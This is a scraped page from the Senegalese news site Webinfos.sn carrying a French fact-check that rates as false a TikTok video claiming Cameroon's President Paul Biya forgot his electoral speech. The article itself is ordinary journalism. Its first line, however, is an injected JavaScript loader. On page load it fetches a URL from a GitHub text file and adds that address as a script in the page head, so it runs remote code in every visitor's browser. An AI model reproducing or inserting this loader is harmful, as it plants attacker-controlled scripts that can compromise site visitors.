;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); FAUX : Le Président Paul Biya n’a pas oublié son discours électoral – Webinfos.sn
Le plaisir de s'informer juste et vrai, en temps réel !

CLIQUEZ SUR L'IMAGE POUR NOUS SOUTENIR

FAUX : Le Président Paul Biya n’a pas oublié son discours électoral

0 66

Une vidéo virale publiée sur TikTok le 30 septembre 2025 prétend que le Président camerounais, Paul Biya, a « oublié son discours électoral ». L’extrait, partagé des milliers de fois, montre le Chef de l’État au pupitre avec cette légende : « le Président oublie son discours électoral ».

 Mais après vérification, cette affirmation est fausse.

La vidéo montre le Président camerounais, Paul Biya en costume bleu, s’adressant à la nation avec en arrière-plan le palais présidentiel. Plusieurs éléments visuels y sont ajoutés : la date « 30/09/2025 » et la mention « discours électoral du 12 octobre ».
Or, cet extrait ne provient pas d’un discours de campagne.

Une vérification d’images montre que le décor et la mise en scène correspondent à ses messages traditionnels à la Nation (comme celui du 31 décembre 2023).
 Les légendes et la date visibles sur la vidéo TikTok ont donc été ajoutées artificiellement pour faire croire à un incident récent. Aucune agence de presse internationale, n’a fait état d’un oubli ou d’un incident lors d’un discours du Président camerounais, Paul Biya.
Ces constats confirment qu’il s’agit d’une vidéo truquée montée à partir de séquences d’archives.

Pourquoi ce fact-checking?

Le Cameroun se préparait à une élection présidentielle prévue en octobre 2025, un contexte particulièrement sensible. Et cette  allégation a émergé lors de la campagne électorale où plusieurs comptes anonymes sur TikTok et Facebook avaient publié des vidéos truquées ou sorties de leur

contexte pour affaiblir l’image du Président Paul Biya, âgé de 92 ans, ou déstabiliser le processus électoral.

D’après l’Observatoire Africain des Médias Numériques, le Cameroun figure parmi les pays d’Afrique centrale les plus exposés aux campagnes de désinformation politique. Certaines vidéos, diffusées depuis l’étranger, visent à créer la confusion et diviser l’opinion publique. Toutefois, le scrutin présidentiel s’est tenu sans grands incidents le 12 octobre 2025 et le Président sortant, Paul Biya, a été déclaré élu pour un 8e mandat présidentiel de 7 ans.

Verdict

La vidéo virale repose sur un montage d’anciennes images assorties de légendes trompeuses. Aucune preuve, ni source officielle ne confirme un incident ou un oubli dudit discours au cours de sa campagne électorale. Après toutes ces vérifications, nous avons conclu que cette vidéo prétendant annoncer que le Président de la République du Cameroun a oublié son discours lors de sa campagne électorale est FAUSSE.

Ce fact-check a été produit par Cheikh Diop dans le cadre du programme d’incubation de l’Alliance africaine de vérification des faits (AFCA). Il a été réalisé sous le parrainage de PesaCheck, l’initiative de vérification des faits de Code for Africa, avec le soutien technique de la Deutsche Gesellschaft für Internationale Zusammenarbeit (GIZ) GmbH, financée par le Bundesministerium für wirtschaftliche Zusammenarbeit und Entwicklung (BMZ) et l’Union européenne (UE). Le mentorat de l’AFCA respecte l’indépendance journalistique des chercheurs, en leur offrant l’accès à des techniques et des outils avancés. La prise de décision éditoriale reste du ressort de Cheikh Diop

Laisser un commentaire

Votre adresse email ne sera pas publiée.